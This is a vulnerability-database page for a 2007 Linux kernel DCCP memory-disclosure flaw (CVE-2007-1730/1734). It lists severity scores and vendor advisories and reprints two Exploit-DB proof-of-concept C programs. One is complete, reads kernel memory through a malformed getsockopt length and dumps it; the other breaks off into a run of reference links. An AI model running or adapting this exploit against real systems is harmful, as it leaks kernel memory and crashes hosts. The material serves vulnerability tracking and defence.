CVE-2007-1730
published 2007-03-28CVE-2007-1730: Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later allows local users to read…
PriorityP418medium6.6CVSS 2.0
AVLACLAuNCCINAC
EXPLOIT
EPSS
0.77%
51.1th percentile
Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later allows local users to read kernel memory or cause a denial of service (oops) via a negative optlen value.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.06.6MEDIUMAV:L/AC:L/Au:N/C:C/I:N/A:C
vendor_ubuntu7.8HIGH
vendor_redhat6.6MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-92h4-4w9c-9q5w: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
ghsa_unreviewed·2022-05-01·CVSS 6.6
CVE-2007-1734 [MEDIUM] GHSA-92h4-4w9c-9q5w: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value, which allows local users running on certain architectures to read kernel memory or cause a denial of service (oops), a related issue to CVE-2007-1730.
GHSA
GHSA-3788-fmr6-h469: Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto
ghsa_unreviewed·2022-05-01
CVE-2007-1730 [MEDIUM] GHSA-3788-fmr6-h469: Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto
Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later allows local users to read kernel memory or cause a denial of service (oops) via a negative optlen value.
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2007-05-24·CVSS 7.8
CVE-2007-1357 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
Philipp Richter discovered that the AppleTalk protocol handler did
not sufficiently verify the length of packets. By sending a crafted
AppleTalk packet, a remote attacker could exploit this to crash the
kernel. (CVE-2007-1357)
Gabriel Campana discovered that the do_ipv6_setsockopt() function did
not sufficiently verifiy option values for IPV6_RTHDR. A local
attacker could exploit this to trigger a kernel crash. (CVE-2007-1388)
A Denial of Service vulnerability was discovered in the
nfnetlink_log() netfilter function. A remote attacker could exploit
this to trigger a kernel crash. (CVE-2007-1496)
The connection tracking module for IPv6 did not properly handle the
status field when reassembling fragmented packets,
Red Hat
CVE-2007-1734: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
vendor_redhat·CVSS 6.6
CVE-2007-1734 [MEDIUM] CVE-2007-1734: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value, which allows local users running on certain architectures to read kernel memory or cause a denial of service (oops), a related issue to CVE-2007-1730.
Statement: Not vulnerable. This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
Red Hat
kernel dccp memory disclosure
vendor_redhat·CVSS 6.6
CVE-2007-1730 [MEDIUM] kernel dccp memory disclosure
kernel dccp memory disclosure
Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later allows local users to read kernel memory or cause a denial of service (oops) via a negative optlen value.
Statement: Not vulnerable. This issue did not affect the version of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
No detection rules found.
Exploit-DB
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)
exploitdb·2007-03-28
CVE-2007-1734 Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)
---
#include
#include
#include
#include
#include
#include
#include
#define BUFSIZE 0x10000000
int main(int argc, char *argv[])
{
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem == (void*)-1) {
printf("Alloc failed\n");
return -1;
}
/* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33);
if (s == -1) {
fprintf(stderr, "socket failure!\n");
return 1;
}
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
int len = BUFSIZE;
int x = getsockopt(s, 269, 11, mem, &len);
if (x == -1)
perror("SETSOCKOPT");
else
printf("SUCCESS\n");
write(1, mem, BUFSIZE);
return 0;
}
// milw0rm.com [2007-03-28]
Exploit-DB
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)
exploitdb·2007-03-27
CVE-2007-1734 Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)
---
/*
Linux Kernel DCCP Memory Disclosure Vulnerability
Synopsis:
The Linux kernel is susceptible to a locally exploitable flaw
which may allow local users to steal data from the kernel memory.
Vulnerable Systems:
Linux Kernel Versions: >= 2.6.20 with DCCP support enabled.
Kernel versions
#include
#include
#include
#include
#include
#include
#define BUFSIZE 0x10000000
int main(int argc, char *argv[])
{
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (!mem) {
printf("Cannot allocate mem\n");
return 1;
}
/* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33);
if (s == -1) {
fprintf(stderr, "socket failure!\n");
return 1;
}
int len = -1;
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV
http://marc.info/?l=dccp&m=117509584316267&w=2http://secunia.com/advisories/25392http://securityreason.com/securityalert/2482http://www.securityfocus.com/archive/1/463934/100/0/threadedhttp://www.securityfocus.com/archive/1/464144/100/0/threadedhttp://www.securityfocus.com/bid/23162http://www.securitytracker.com/id?1017820http://www.ubuntu.com/usn/usn-464-1http://www.vupen.com/english/advisories/2007/1143https://exchange.xforce.ibmcloud.com/vulnerabilities/33274http://marc.info/?l=dccp&m=117509584316267&w=2http://secunia.com/advisories/25392http://securityreason.com/securityalert/2482http://www.securityfocus.com/archive/1/463934/100/0/threadedhttp://www.securityfocus.com/archive/1/464144/100/0/threadedhttp://www.securityfocus.com/bid/23162http://www.securitytracker.com/id?1017820http://www.ubuntu.com/usn/usn-464-1http://www.vupen.com/english/advisories/2007/1143https://exchange.xforce.ibmcloud.com/vulnerabilities/33274
2007-03-28
Published